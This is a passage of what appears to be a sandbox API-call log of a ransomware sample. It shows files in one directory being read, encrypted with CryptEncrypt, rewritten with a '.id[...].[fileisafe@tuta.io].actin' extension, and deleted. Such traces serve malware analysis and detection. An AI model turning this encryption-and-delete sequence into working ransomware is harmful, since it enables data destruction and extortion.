[0047.568] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x1397e, lpOverlapped=0x0) returned 1 [0047.772] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13980, dwBufLen=0x13980 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13980) returned 1 [0047.773] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x13980, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x13980, lpOverlapped=0x0) returned 1 [0047.786] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c80) returned 1 [0047.786] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.786] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.786] CryptDestroyKey (hKey=0xf71c80) returned 1 [0047.786] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.786] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0047.786] CloseHandle (hObject=0x314) returned 1 [0047.787] CloseHandle (hObject=0x320) returned 1 [0047.789] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 1 [0047.790] SetEvent (hEvent=0x2e8) returned 1 [0047.790] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.791] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0048.527] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=79996) returned 1 [0048.527] CloseHandle (hObject=0x320) returned 1 [0048.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 0x80 [0048.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.528] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0048.528] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.528] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.528] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0048.529] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e00) returned 1 [0048.529] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0048.529] ReadFile (in: hFile=0x320, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x1387c, lpOverlapped=0x0) returned 1 [0048.533] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13880, dwBufLen=0x13880 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13880) returned 1 [0048.533] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x13880, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x13880, lpOverlapped=0x0) returned 1 [0048.535] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0048.535] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0048.535] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0048.535] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0048.535] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0048.536] CryptDestroyKey (hKey=0xf71e00) returned 1 [0048.536] CloseHandle (hObject=0x320) returned 1 [0048.536] CloseHandle (hObject=0x340) returned 1 [0048.539] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 1 [0048.540] SetEvent (hEvent=0x2e8) returned 1 [0048.540] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0048.540] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0048.541] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=88533) returned 1 [0048.541] CloseHandle (hObject=0x340) returned 1 [0048.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 0x80 [0048.541] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.541] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0048.541] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.541] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.541] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0048.541] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c00) returned 1 [0048.541] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0048.541] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x159d5, lpOverlapped=0x0) returned 1 [0048.544] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x159e0, dwBufLen=0x159e0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x159e0) returned 1 [0048.544] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x159e0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x159e0, lpOverlapped=0x0) returned 1 [0048.547] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71fc0) returned 1 [0048.547] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0048.547] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0048.547] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0048.547] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0048.547] CryptDestroyKey (hKey=0xf71c00) returned 1 [0048.547] CloseHandle (hObject=0x340) returned 1 [0048.547] CloseHandle (hObject=0x320) returned 1 [0048.549] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 1 [0048.551] SetEvent (hEvent=0x2e8) returned 1 [0048.551] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0048.551] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0048.551] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=93314) returned 1 [0048.551] CloseHandle (hObject=0x320) returned 1 [0048.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 0x80 [0048.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.552] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0048.552] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.552] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.552] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0048.552] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71a40) returned 1 [0048.552] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0048.552] ReadFile (in: hFile=0x320, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x16c82, lpOverlapped=0x0) returned 1 [0048.554] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x16c90, dwBufLen=0x16c90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x16c90) returned 1 [0048.554] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x16c90, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x16c90, lpOverlapped=0x0) returned 1 [0048.557] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0048.557] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0048.557] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0048.557] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0048.557] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0048.557] CryptDestroyKey (hKey=0xf71a40) returned 1 [0048.557] CloseHandle (hObject=0x320) returned 1 [0048.557] CloseHandle (hObject=0x340) returned 1 [0048.560] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 1 [0048.561] SetEvent (hEvent=0x2e8) returned 1 [0048.561] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0048.561] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0048.562] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=39050) returned 1 [0048.562] CloseHandle (hObject=0x340) returned 1 [0048.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 0x80 [0048.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.562] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0048.562] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.562] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0048.562] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.085] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71a80) returned 1 [0049.085] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.085] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x988a, lpOverlapped=0x0) returned 1 [0049.087] CryptEncrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x9890, dwBufLen=0x9890 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x9890) returned 1 [0049.087] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x9890, lpOverlapped=0x0) returned 1 [0049.088] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e80) returned 1 [0049.088] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.088] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.088] CryptDestroyKey (hKey=0xf71e80) returned 1 [0049.088] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.089] CryptDestroyKey (hKey=0xf71a80) returned 1 [0049.089] CloseHandle (hObject=0x340) returned 1 [0049.089] CloseHandle (hObject=0x314) returned 1 [0049.093] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 1 [0049.094] SetEvent (hEvent=0x2e8) returned 1 [0049.094] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.094] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.095] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=894) returned 1 [0049.095] CloseHandle (hObject=0x314) returned 1 [0049.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 0x80 [0049.095] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.095] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.095] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.095] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.096] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.096] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b40) returned 1 [0049.096] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.096] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x37e, lpOverlapped=0x0) returned 1 [0049.097] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380, dwBufLen=0x380 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380) returned 1 [0049.097] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x380, lpOverlapped=0x0) returned 1 [0049.098] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72100) returned 1 [0049.098] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.098] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.098] CryptDestroyKey (hKey=0xf72100) returned 1 [0049.098] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.098] CryptDestroyKey (hKey=0xf71b40) returned 1 [0049.098] CloseHandle (hObject=0x314) returned 1 [0049.098] CloseHandle (hObject=0x340) returned 1 [0049.099] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 1 [0049.100] SetEvent (hEvent=0x2e8) returned 1 [0049.100] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.100] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.100] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=894) returned 1 [0049.100] CloseHandle (hObject=0x340) returned 1 [0049.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 0x80 [0049.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.101] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.101] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.101] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.101] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.101] CryptImportKey (in: 